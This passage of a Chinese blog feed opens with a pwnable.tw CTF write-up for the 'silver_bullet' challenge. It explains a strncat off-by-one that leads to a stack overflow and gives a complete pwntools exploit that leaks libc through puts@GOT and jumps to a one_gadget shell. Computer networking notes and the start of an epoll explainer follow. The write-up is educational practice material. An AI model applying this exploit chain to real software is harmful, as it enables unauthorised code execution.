    <content type="html"><![CDATA[<h2 id="简介">简介</h2><p>这里将保存部分做过的 <a href="http://pwnable.tw">pwnable.tw</a> 的题解。</p><span id="more"></span><h2 id="一、silver-bullet">一、silver_bullet</h2><h3 id="1-环境配置">1. 环境配置</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">patchelf --replace-needed ./libc_32.so.6 /home/Kiprey/Desktop/Pwn/libc_32.so.6 ./silver_bullet</span><br><span class="line">patchelf --set-interpreter /mylibs/2.23-0ubuntu10_i386/ld-2.23.so ./silver_bullet</span><br></pre></td></tr></table></figure><h3 id="2-查看保护">2. 查看保护</h3><p><img src="/2021/09/pwnable-tw-2/image-20210909104505396.png" alt="image-20210909104505396"></p><p>No canary &amp;&amp; No PIE.</p><h3 id="3-运行流程">3. 运行流程</h3><ul><li><p>在 <code>create_bullet</code> 函数中，程序会要求用户输入一串字符串，并放置长度至特定位置。</p><p><img src="/2021/09/pwnable-tw-2/image-20210909135701700.png" alt="image-20210909135701700"></p><blockquote><p>这里看汇编会比伪代码更清楚一点</p></blockquote><p>可以看到，程序将读入的字符串放入 <code>char s[0x30]</code>的缓冲区中，并将其长度放至 <code>s[0x30]</code> 地址上。</p></li><li><p>而在 <code>power_up</code> 函数中，程序会额外读入 <code>0x30-strlen(s)</code>的字符串，并拼接至原先的缓冲区字符串上。</p><p><img src="/2021/09/pwnable-tw-2/image-20210909140110048.png" alt="image-20210909140110048"></p><p>关键的漏洞点在于<code>strncat</code>这个函数的使用。通过查阅 Linux Manual Page，我们可以很容易的得到这样的一段话：</p><blockquote><p><strong>If src contains n or more bytes, strncat() writes n+1 bytes to dest</strong> (n from  src  plus  the  terminating  null byte).  Therefore, <strong>the size of dest must be at least strlen(dest)+n+1.</strong></p></blockquote><p>因此此处将会有一个 off-by-one 的漏洞，<strong>将存储字符串长度的内存位置覆盖为0</strong>，因此若下一次执行<code>power_up</code>函数时，由于长度被覆盖为0，因此仍然可以继续拼接字符串至原先的字符串上，而这就造成了<strong>栈溢出</strong>。</p></li><li><p>对于栈溢出的利用，我们自然希望 main 函数可以正常 return，这样就可以利用被修改的 ret addr 来跳转至任意位置。但 main 函数若要正常 return，则需要让函数 <code>beat</code> 的返回值为1。</p><p><img src="/2021/09/pwnable-tw-2/image-20210909151949446.png" alt="image-20210909151949446"></p><p>其中，怪物的血量为 0x7fffffff，而子弹的攻击值为 存放在s[0x30]。我们可以在 <code>power_up</code>  栈溢出时，先将 s[0x30] 覆盖为一个超大值，这样经过一番执行，最终的 s[0x30] 就是一个超大值:</p><p><img src="/2021/09/pwnable-tw-2/image-20210909152350997.png" alt="image-20210909152350997"></p><p>这样最终我们便可以达到从 main 函数返回的目的。</p></li><li><p>栈溢出利用，我们可以先泄露 GOT 上的函数地址，算出 libc 基地址，最后算出 system 函数以及 bin_sh 的地址，然后跳转回 main 函数，重新覆盖 ret addr 为 system，并执行 /bin/sh。或者用 one_gadget 一把梭也很酸爽。</p></li></ul><h3 id="4-Exploit">4. Exploit</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">ELFname = <span class="string">&quot;./silver_bullet&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) &gt; <span class="number">1</span>:</span><br><span class="line">    io = remote(<span class="string">&quot;chall.pwnable.tw&quot;</span>, <span class="number">10103</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = process(ELFname)</span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">&quot;./libc_32.so.6&quot;</span>)</span><br><span class="line">e = ELF(ELFname)</span><br><span class="line"></span><br><span class="line">sla = <span class="keyword">lambda</span> msg, content : io.sendlineafter(msg, content)</span><br><span class="line">sl = <span class="keyword">lambda</span> content : io.sendline(content)</span><br><span class="line">rv = <span class="keyword">lambda</span> x=<span class="literal">None</span> : io.recv(x)</span><br><span class="line">ru = <span class="keyword">lambda</span> msg : io.recvuntil(msg)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>(<span class="params">msg = <span class="string">&quot;&quot;</span></span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) == <span class="number">1</span>:</span><br><span class="line">        gdb.attach(io, msg)</span><br><span class="line"></span><br><span class="line">context(terminal=[<span class="string">&#x27;gnome-terminal&#x27;</span>, <span class="string">&#x27;-x&#x27;</span>, <span class="string">&#x27;bash&#x27;</span>, <span class="string">&#x27;-c&#x27;</span>], os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_bullet</span>(<span class="params">bullet</span>):</span><br><span class="line">    sla(<span class="string">&quot;Your choice :&quot;</span>, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;Give me your description of bullet :&quot;</span>, bullet)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">power_up</span>(<span class="params">bullet</span>):</span><br><span class="line">    sla(<span class="string">&quot;Your choice :&quot;</span>, <span class="string">&quot;2&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;Give me your another description of bullet :&quot;</span>, bullet)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">beat</span>():</span><br><span class="line">    sla(<span class="string">&quot;Your choice :&quot;</span>, <span class="string">&quot;3&quot;</span>)</span><br><span class="line"></span><br><span class="line">one_gadget_offset = <span class="number">0x5f065</span> <span class="comment"># 1. esi is the GOT address of libc; 2. eax == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">buffoverflow</span>(<span class="params">data</span>):</span><br><span class="line">        create_bullet(<span class="string">&quot;a&quot;</span>*<span class="number">0x20</span>)</span><br><span class="line">        power_up(<span class="string">&quot;a&quot;</span>*<span class="number">0x10</span>)</span><br><span class="line">        power_up(<span class="string">&quot;\xff\xff\x7f&quot;</span> + <span class="string">&quot;a&quot;</span>*<span class="number">4</span> + data)</span><br><span class="line">        beat()</span><br><span class="line">        beat()</span><br><span class="line">    </span><br><span class="line">    buffoverflow(flat(p32(e.plt[<span class="string">&quot;printf&quot;</span>]), </span><br><span class="line">                      p32(e.symbols[<span class="string">&#x27;main&#x27;</span>]), </span><br><span class="line">                      p32(e.got[<span class="string">&quot;puts&quot;</span>])))</span><br><span class="line"></span><br><span class="line">    ru(<span class="string">&quot;Oh ! You win !!\n&quot;</span>)</span><br><span class="line">    debug()</span><br><span class="line">    puts_got = u32(rv(<span class="number">4</span>))</span><br><span class="line">    log.info(<span class="string">&quot;puts got addr: &quot;</span> + <span class="built_in">hex</span>(puts_got))</span><br><span class="line"></span><br><span class="line">    libc_base = puts_got - libc.symbols[<span class="string">&quot;puts&quot;</span>]</span><br><span class="line">    log.info(<span class="string">&quot;libc base addr: &quot;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">    one_gadget_addr = libc_base + one_gadget_offset</span><br><span class="line">    log.info(<span class="string">&quot;one_gadget addr: &quot;</span> + <span class="built_in">hex</span>(one_gadget_addr))</span><br><span class="line"></span><br><span class="line">    buffoverflow(p32(one_gadget_addr))</span><br><span class="line"></span><br><span class="line">    io.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;p&gt;这里将保存部分做过的 &lt;a href=&quot;http://pwnable.tw&quot;&gt;pwnable.tw&lt;/a&gt; 的题解。&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="pwnable.tw" scheme="https://kiprey.github.io/tags/pwnable-tw/"/>
    
  </entry>
  
  <entry>
    <title>计算机网络笔记-2</title>
    <link href="https://kiprey.github.io/2021/05/cnatda-2/"/>
    <id>https://kiprey.github.io/2021/05/cnatda-2/</id>
    <published>2021-05-24T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.862Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里记录了笔者阅读《计算机网络：自顶向下方法》的一些笔记。笔记有所缩略。</li><li>主要关于<ul><li>第四章：网络层：数据平面</li></ul></li></ul><span id="more"></span><h2 id="第四章：网络层：数据平面">第四章：网络层：数据平面</h2><h3 id="1-网络层概述">1. 网络层概述</h3><ul><li><p>网络层在协议栈中是最复杂的层次。网络层可以被分解为两个相互作用的部分：<strong>数据平面</strong>和<strong>控制平面</strong>。</p><ul><li>数据平面：网络层中<strong>每台路由器</strong>的功能，该数据平面功能决定到达路由器输入链路之一的数据报如何转发到该路由器的输出链路之一。</li><li>控制平面：<strong>网络范围</strong>的逻辑。该控制平面功能控制数据报沿着从源主机到目标主机的端到端路径中路由器之间的路由方式。</li></ul></li><li><p>网络层的作用：将分组从一台发送主机移动到一台接收主机。有两种重要的网络层功能需要被使用：</p><ul><li>转发。当一个分组到达路由器的输入链路时，该路由器必须将该分组移动到适当的输出链路。<strong>转发是在数据平面中实现的唯一功能</strong>。</li><li>路由选择。网络层必须决定分组所采用的路由或路径。计算这些路径的算法称为<strong>路由选择算法</strong>。</li></ul><p>需要注意的是，<strong>转发</strong>和<strong>路由选择</strong>是两个截然不同的词语。</p><ul><li><strong>转发forwarding</strong>是指将分组从一个输入链路接口移动到适当的输出链路接口的路由器本地动作。时间尺度很短，通常为几纳秒。</li><li><strong>路由选择routing</strong>是指确定分组从源到目的地所采取的端到端路径的网络范围处理过程，时间尺度较长，通常为几秒。</li></ul><p>每个网络路由器中都有一个<strong>转发表forwarding table</strong>。路由器检查到达分组首部的一个或多个字段，进而使用这些首部值在其转发表中索引，并通过这种方法来转发分组。</p><p>转发表的设置有两种方式：</p><ul><li><p>传统的方式。<strong>路由选择算法</strong>决定了插入该路由器转发表中的内容。在一台路由器中的路由选择算法与在其他路由器中的路由选择算法通信，以计算出它的转发表的值。这种通信是通过<strong>根据路由选择协议</strong>交换<strong>包含路由选择信息</strong>的<strong>路由选择报文</strong>。</p><p><img src="/2021/05/cnatda-2/image-20210515175625818.png" alt="image-20210515175625818"></p></li><li><p>SDN方式。远程控制器计算和分发转发表以供每台路由器使用。控制平面路由选择功能与物理的路由器是分开的，路由选择设备只执行转发，而远程控制器计算并分发转发表。以下是**软件定义网络（Software-Defined Networking, SDK）**的一个例子：</p><p><img src="/2021/05/cnatda-2/image-20210515175645704.png" alt="image-20210515175645704"></p></li></ul></li><li><p>网络服务模型</p><ul><li>因特网的网络层提供了单一的服务，称为<strong>尽力而为服务best-effort service</strong>。</li><li>约定术语<strong>分组交换机</strong>是指一台通用分组交换设备，它根据分组首部字段中的值，从输入链路接口到输出链路接口转移分组。<ul><li>某些分组交换机称为<strong>链路层交换机</strong>link-layer switch，基于<strong>链路层帧</strong>中的字段值做出转发决定，这些交换机因此称为<strong>链路层设备</strong>。</li><li>其他分组交换机称为<strong>路由器</strong>router，基于<strong>网络层数据报</strong>中的首部字段值做出转发决定。路由器因此是<strong>网络层设备</strong>。</li></ul></li></ul></li></ul><h3 id="2-路由器工作原理">2. 路由器工作原理</h3><h4 id="a-通用路由器体系结构">a. 通用路由器体系结构</h4><p><img src="/2021/05/cnatda-2/image-20210515181508354.png" alt="image-20210515181508354"></p><ul><li>输入端口。<ul><li>在路由器中执行终结<strong>入物理链路</strong>的物理层功能（最外侧的方框）</li><li>还要与位于<strong>入链路</strong>远端的数据链路层交互来执行数据链路层功能（较中间的方框）</li><li>在输入口执行查找功能（最内侧的方框）。正是在这里通过查找转发表决定路由器的输出端口，到达的分组通过路由器的交换结构转发到输出端口。</li></ul></li><li>交换结构。交换结构将路由器的输入端口连接到它的输出端口。</li><li>输出端口。输出端口存储从交换结构接收的分组，并通过执行必要的链路层和物理层功能在输出链路上传输这些分组。</li><li>路由选择处理器。执行控制平面功能，例如维护路由选择表与关联链路状态信息，计算转发表等等。</li></ul><h4 id="b-输入-输出端口处理-基于目的地转发">b. 输入/输出端口处理 &amp; 基于目的地转发</h4><p>输入端口的线路段接功能与链路层处理实现了用于各个输入链路的物理层和链路层。转发表从路由选择处理器经过独立总线复制到线路卡。因此转发决策<strong>可以使用在每个输入端口的转发表副本</strong>，在<strong>每个输入端口本地做出</strong>，提高效率。</p><p><img src="/2021/05/cnatda-2/image-20210515185638281.png" alt="image-20210515185638281"></p><p>输出端口处理操作与输入端口类似，包括选择和取出排队中分组进行传输、执行所需的链路层和物理层传输功能。</p><p><img src="/2021/05/cnatda-2/image-20210515190039325.png" alt="image-20210515190039325"></p><p>当路由表中有多个匹配项时，路由器使用<strong>最长前缀匹配规则</strong>，即在该表中寻找最长的匹配项，并向与最长前缀匹配相关联的链路接口转发分组。</p><h4 id="c-交换">c. 交换</h4><p>交换结构位于一台路由器的核心部位，正是通过这种结构，分组才能实际的从一个输入端口交换到一个输出端口。交换可以用许多方式完成：</p><p><img src="/2021/05/cnatda-2/image-20210515190159433.png" alt="image-20210515190159433"></p><h4 id="d-排队">d. 排队</h4><p>当路由器的缓存空间被耗尽，无内存可用于储存到达的分组时将会出现<strong>丢包packet loss</strong>，即<strong>在网络中丢失</strong>或<strong>被路由器丢弃</strong>。排队有两种，一种是输入排队；另一种是输出排队。</p><blockquote><p>以下说明的情况假定</p><ul><li>所有链路速度相同。</li><li>一个分组能够以一条输入链路接收一个分组所用的相同的时间量，从任意一个输入端口传送到给定的输出端口。</li><li>分组按FCFS（先来先服务）方式，从一指定输入队列移动到其要求的输出队列中。只要其<strong>输出端口不同，多个分组可以被并行发送</strong>。</li></ul></blockquote><p><strong>输入排队</strong>：</p><ul><li><p>如果交换结构不能快的使所有到达分组无时延地通过它传送，那么输入端口也将出现分组排队，因为到达地分组必须加入输入端口队列中，以等待通过交换结构传送到输出端口。</p></li><li><p>如果位于两个输入队列前端的两个分组是发往同一输出队列的，则其中的一个分组将被阻塞，且必须在输入队列中等待。因为交换结构一次只能传送一个分组到某指定端口。</p></li><li><p>输入排队交换机中的<strong>线路前部Head-of-the-Line，HOL</strong>阻塞，即在一个输入队列中排队的分组，<strong>因为被位于线路前部的另一个分组所阻塞</strong>，使得<strong>必须等待</strong>通过交换结构发送。</p><p><img src="/2021/05/cnatda-2/image-20210515192933636.png" alt="image-20210515192933636"></p></li></ul><p><strong>输出排队</strong>：</p><ul><li><p>当没有足够的内存来缓存一个入分组时，就必须做出决定：</p><ul><li>要么丢弃到来的分组（<strong>弃尾</strong>策略）</li><li>要么删除一个或多个已排队的分组为新来的分组腾出空间。</li></ul><p>在某些情况下，在缓存填满<strong>之前</strong>便丢弃一个分组（或在其首部加上标记），可以<strong>提前</strong>向发送方提供一个拥塞信号。这些处理分组丢失与标记的策略，统称为<strong>主动队列管理（Active Queue Management, AQM）算法</strong>。其中，刚刚所说明的<strong>随机早期检测（Random Early Detection, RED）算法</strong>是得到最广泛研究和实现的AQM算法之一。</p></li></ul><p>计算路由器缓存大小的经验方法是：缓存数量（B）应该等于平均往返事件（RTT）乘以链路容量（C）。即$B=RTT * C$。该结果基于<strong>相对少量</strong>的TCP流的排队动态性分析得到。</p><blockquote><p>例如一条具有250ms RTT的10Gbps链路需要的缓存量等于 B = 2.5Gb.</p></blockquote><p>最近的实验表明，当有<strong>大量TCP流</strong>流过一条链路时，缓存所需要的数据量是$B=RTT * C / \sqrt{n}$。</p><h4 id="e-分组调度">e. 分组调度</h4><ul><li><p>先进先出。</p></li><li><p>优先权排队</p><ul><li>在优先权排队规则下，到达输出链路的分组被分类放入输出队列中的优先权类。每个优先权类通常都有自己的队列。当选择一个分组传输时，优先权排队规则将从队列为<strong>非空</strong>的<strong>最高优先权类</strong>中传输一个分组。在<strong>同一优先权类</strong>的分组之间的选择通常以FIFO方式完成。</li><li>在<strong>非抢占式优先权排队</strong>规则下，一旦分组开始传输，就不能打断。</li></ul></li><li><p>循环和加权公平排队</p><ul><li><p>在<strong>循环排队规则</strong>下，分组像使用优先权排队那样<strong>被分类</strong>。然而在<strong>类之间不存在严格的服务优先权</strong>，循环调度器在这些类之间<strong>轮流提供服务</strong>。一个所谓的<strong>保持工作队列(work-conserving queueing)规则</strong>在有任何类的分组排队等待传输时，不允许链路保持空闲。当寻找给定类的分组但没有找到时，将立即检查循环序列中的下一个类。</p></li><li><p>一种通用形式的循环排队已经广泛实现在路由器中，即<strong>加权公平排队(Weighted Fair Queuing, WFQ)规则</strong>。不同点在于，每个类在任何时间间隔内可能收到<strong>不同数量</strong>的服务，即第 i 类将确保接收到的服务部分等于 $W_i / W$，其中$W$为所有权重之和。</p><p><img src="/2021/05/cnatda-2/image-20210515201004707.png" alt="image-20210515201004707"></p></li></ul></li></ul><h3 id="3-网际协议：IPv4、寻址、IPv6-及其他">3. 网际协议：IPv4、寻址、IPv6 及其他</h3><h4 id="1-IPv4数据报格式">1. IPv4数据报格式</h4><p>网络层分组统称为<strong>数据报</strong>。IPv4数据报格式如下：</p><p><img src="/2021/05/cnatda-2/image-20210515212314203.png" alt="image-20210515212314203"></p><p>其中，关键字段如下：</p><ul><li><p><strong>版本（号）</strong>。这4bit规定了数据报的IP协议版本。通过查看版本号，路由器能够确定如何解释IP数据报的剩余部分。不同的IP版本使用不同的数据报格式。</p></li><li><p><strong>首部长度</strong>。一个IPv4数据报可包含一些可变数量的选项，故需要用这4bit来确定IP数据报中载荷实际开始的地方。大多数IP数据报不包含选项，所以通常具有<strong>20字节</strong>的首部。</p></li><li><p><strong>服务类型</strong>。服务类型(TOS)比特包含在 IPv4首部中，以便使不同类型的IP数据报相互区分开。</p></li><li><p><strong>数据报长度</strong>。IP数据报的总长度（首部+数据）。该字段有16比特的宽度。</p></li><li><p><strong>标识、标志、片偏移</strong>。主要涉及到<strong>IP分片（重点）</strong>。</p></li><li><p><strong>寿命</strong>。即Time-to-Live, TTL。用来确保数据报不会永远在网络中循环。每当一台路由器处理数据报时，该字段的值减1。若TTL字段为0，则该数据报必须丢弃。</p></li><li><p><strong>协议</strong>。该字段通常只会在IP数据报到达最终目的地时才有效，主要指定IP数据报的数据部分应交付给哪个特定的运输层协议。例如 6 表示交付给TCP，17表示交付给UDP。</p></li><li><p><strong>首部校验和</strong>。用于帮助路由器检测收到的IP数据报中的<strong>首部</strong>比特错误。路由器会对每个收到的IP数据报计算其首部校验和，如果检测出差错，一般情况下则丢弃该报文。</p><p>需要注意的是，在每台路由器上都必须重新计算检验和并再次存放到原处，因为TTL字段以及可能的选项字段会改变。</p><p>为什么TCP/IP 在运输层和网络层都执行差错检测？原因如下：</p><ul><li><p>IP层只对IP首部计算了校验和，而TCP/UDP检验和是对整个TCP/UDP报文段进行的。</p></li><li><p>TCP/UDP与IP不一定必须属于同一个协议栈，原则上说TCP能够运行在一个不同的协议上。而IP不一定要传递TCP/UDP的数据。</p></li></ul></li><li><p><strong>源和目的IP地址</strong>。当某源生成一个数据报时，它在源IP字段插入它的IP地址，在目的IP字段中插入其最终目的地的地址。</p><blockquote><p>注意：TCP/UDP中插入的是源和目的<strong>端口号</strong>，注意区分。</p></blockquote></li><li><p><strong>选项</strong>。该字段允许IP首部被扩展。</p></li><li><p><strong>数据</strong>。目标传输的数据。</p></li></ul><h4 id="2-IPv4-数据报分片">2. IPv4 数据报分片</h4><p><strong>不是所有链路层协议都能承载相同长度的网络层分组</strong>。而一个链路层帧能承载的最大数据量叫做<strong>最大传送单元(Maximum Transmission Unit, MTU)</strong>。链路层协议的MTU严格限制IP数据报的长度，同时每条链路可能使用不同的链路层协议，有着不同的MTU。</p><p>若收到了一个IP数据报，转发时发现<strong>输出链路的MTU比该IP数据报的长度要小</strong>，则必须将IP数据报中的数据<strong>分片</strong>成两个或更多个较小的IP数据报，并用<strong>单独的链路层帧</strong>来封装这些较小的IP数据报，并最终通过输出链路发送这些帧。其中这些<strong>较小的数据报</strong>被称为<strong>片fragment</strong>。</p><p>由于分片机制的存在， 片到达目的地运输层之前需要重新组装。IPv4将数据报的重新组装工作放到<strong>端系统</strong>完成，而不是网络路由器中。</p><p>当一台目的主机从相同源收到一系列数据报时，它需要确定这些数据报中的某些<strong>是否是一些原来较大的数据报的片</strong>。如果是，则必须进一步确认<strong>何时收到最后一片</strong>，并判断<strong>如何将这些接收到的片拼接在一起</strong>以形成初始的数据报。为了实现这些任务，IPv4将<strong>标识</strong>、<strong>标志</strong>和<strong>片偏移字段</strong>放在IP数据报首部中。使用方式如下所示：</p><ul><li>当生成一个数据报时，发送主机在为该数据报设置源和目的地址的同时贴上标识号。</li><li>发送主机通常会将它发送的每个数据报的标识号加1.</li><li>当某路由器需要对一个数据报分片时，形成的每个数据报具有初始数据报的源地址、目的地址和标识号。</li></ul><p>这样，当目的地从同一个发送主机收到一系列数据报时，它能够检查数据报的标识号以确定哪些数据实际上是同一较大数据报的片。</p><blockquote><p>注意这里的<strong>标识号</strong>，其功能同样与TCP中的<strong>序号</strong>不同，切勿混淆！</p></blockquote><p>为了让目的主机相信它<strong>已经收到初始数据报的最后一片</strong>，<strong>最后一个片的标志比特</strong>被设置为0，而所有其他片的标志比特被设置为1。同时为了让目的主机确定是否丢失一个片，并且按照正确顺序重新组装片，使用<strong>偏移字段</strong>指定该片应放在初始IP数据报中的哪个位置。</p><h4 id="3-IPv4-编址">3. IPv4 编址</h4><ul><li><p>主机与物理链路之间的边界叫做<strong>接口interface</strong>。因为每台主机与路由器都能发送和接收IP数据报，IP要求每台主机和路由器接口拥有自己的IP地址，因此<strong>从技术上讲，一个IP地址与一个接口相关联，而不是与包括该接口的主机或路由器相关联</strong>。</p><p>以下是一个IP编址与接口的例子。其中某一部分的四个接口通过一个<strong>并不包含路由器的网络</strong>互联起来，例如以太网交换机等等，在此处用一朵云来表示：</p><p><img src="/2021/05/cnatda-2/image-20210515222639352.png" alt="image-20210515222639352"></p></li><li><p>互联这3个主机接口与一个路由器接口的网络形成一个<strong>子网</strong>。IP编址为这个子网分配一个地址223.1.1.0/24，其中的<code>/24</code>记法，称为<strong>子网掩码</strong>，表示32比特中的最左侧24比特定义了子网地址。</p><p>一个子网的IP定义并不局限于连接多台主机到一个路由器接口的以太网段。子网的定义如下所示：</p><blockquote><p>为了确认子网，分开主机和路由器的每个接口，产生几个隔离的网络岛，使用接口端接这些隔离的网络的端点。这些隔离的网络中的每一个都叫做一个<strong>子网subnet</strong>。</p></blockquote><p>一个简单的例子：</p><p><img src="/2021/05/cnatda-2/image-20210515225343646.png" alt="image-20210515225343646"></p></li><li><p>因特网的地址分配策略被称为<strong>无类别域间路由选择Classless Interdomain Routing, CIDR</strong>。当使用子网寻址时，32比特的IP地址被划分成两部分，并具有点分十进制数形式<code>a.b.c.d/x</code>，其中x指示了地址的<strong>第一部分中的比特数</strong>。形式为<code>a.b.c.d/x</code>的地址的x的最高比特构成了IP地址的网络部分，并且经常被称为该地址的<strong>前缀</strong>。</p><blockquote><p>注意：路由表使用<strong>最长前缀匹配</strong>原则。</p></blockquote></li><li><p>在CIDR被采用之前，IP地址的网络部分被限制为长度为8、16、24比特，这是一种称为<strong>分类编址</strong>的编址方案。这是因为<strong>具有8、16和24比特子网地址的子网分别称为A、B和C类网络</strong>。</p></li><li><p><code>255.255.255.255</code>为IP<strong>广播地址</strong>。当一台主机发出一个目的地址为<code>255.255.255.255</code>的数据报时，该报文会交付给同一个网络中的所有主机。路由器也会有选择地向邻近的子网发送该报文。</p></li><li><p><strong>获取主机地址：动态主机配置协议</strong></p><ul><li><p><strong>动态主机配置协议（Dynamic Host Configuration, DHCP）<strong>允许主机自动获取一个IP地址。除了IP地址分配以外，DHCP还允许让主机得知其子网掩码、第一跳路由器地址（即</strong>默认网关</strong>）、本地DNS服务器地址等等。DHCP具有将主机连接进一个网络的网络相关方面的自动能力，故它又常被称为<strong>即插即用协议</strong>或<strong>零配置协议</strong>。</p></li><li><p>DHCP是一个客户-服务器协议。客户通常是新到达的主机，它要获取包括自身使用的IP地址在内的网络配置信息。因此在最简单场合下，每个子网将具有一台DHCP服务器。如果在某子网中没有服务器，则需要一个DHCP中继代理（通常是一台路由器），该代理知道用于该网络的DHCP服务器的地址。</p></li><li><p>DHCP分配地址给新到达客户的流程如下：</p><ul><li><p><strong>DHCP服务器发现</strong>。一台新到达的主机的首要任务是发现一个要与其交互的DHCP服务器，这通过使用<strong>DHCP发现报文</strong>来完成。</p><p>客户使用UDP向端口67发送该发现报文，其中目标IP地址中填入广播地址<code>255.255.255.255</code>；源IP地址中填写本机地址<code>0.0.0.0</code>。</p></li><li><p><strong>DHCP服务器提供</strong>。当DHCP服务器收到一个DHCP发现报文时，用<strong>DHCP提供报文</strong>向客户端做出响应。该报文向该子网的所有结点广播，仍然使用IP广播地址。由于在子网中可能存在多个DHCP服务器，因此该客户或许可以在多个提供的IP地址中进行选择。</p><p>每台服务器提供的报文包含有<strong>收到的发现报文的事务ID</strong>、<strong>向客户端推荐的IP地址</strong>、<strong>网络掩码</strong>以及<strong>IP地址租用期</strong>。</p></li><li><p><strong>DHCP请求</strong>。新到达的客户从一个或多个服务器提供中选择一个，并向选中的服务器提供用<strong>DHCP请求报文</strong>进行响应，回显配置的参数。</p></li><li><p><strong>DHCP ACK</strong>。服务器用<strong>DHCP ACK报文</strong>对DHCP请求报文进行响应，证实所要求的参数。</p></li></ul><p><img src="/2021/05/cnatda-2/image-20210515233546620.png" alt="image-20210515233546620"></p></li></ul></li></ul><h4 id="4-网络地址转换">4. 网络地址转换</h4><p>网络地址转换，即 <strong>NAT</strong>，可以使能路由器对于外部世界来说<strong>不像</strong>一台服务器，而是如同一个具有<strong>单一</strong> IP 地址的<strong>单一</strong>设备，使得路由器对外界<strong>隐藏了内部网络细节</strong>。</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里记录了笔者阅读《计算机网络：自顶向下方法》的一些笔记。笔记有所缩略。&lt;/li&gt;
&lt;li&gt;主要关于
&lt;ul&gt;
&lt;li&gt;第四章：网络层：数据平面&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
  </entry>
  
  <entry>
    <title>Epoll 小叙</title>
    <link href="https://kiprey.github.io/2021/05/epoll/"/>
    <id>https://kiprey.github.io/2021/05/epoll/</id>
    <published>2021-05-21T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.002Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、概述">一、概述</h2><ul><li><p>epoll 是  Linux 内核为了处理大批量的文件描述符而改进的 poll，是 Linux 下多路复用IO接口select/poll的增强版本。epoll可以显著提高程序在大量并发连接中只有少量活跃的情况下的系统的CPU利用率。</p></li><li><p>服务器要管理多个客户端的连接，而 recv 函数只能监视单个 socket，因此引入了 select/poll。</p><p>但 select 能监测的文件描述符个数限制在 FD_SETSIZE，通常是1024个。这对于并发量达到上万的服务器来说显然不够。与之相对的是，epoll所支持的fd上限是最大可以打开的数目，具体数字可以<code>cat /proc/sys/fs/file-max</code>查看（本人机器上该值为<code>9223372036854775807</code>）。</p></li><li><p>当存在部分<strong>活跃</strong>socket时，传统 select/poll 会<strong>线性扫描</strong>整个socket集合，这会让效率随着socket数量的增加而线性下降，而这就是限制了 select 最大监视数量的原因，程序被唤醒后不知道是哪个 socket 处于活跃状态，需要遍历。</p><p>而 epoll 是基于每个 fd 上面的 callback 函数实现，因此只会对活跃的 socket 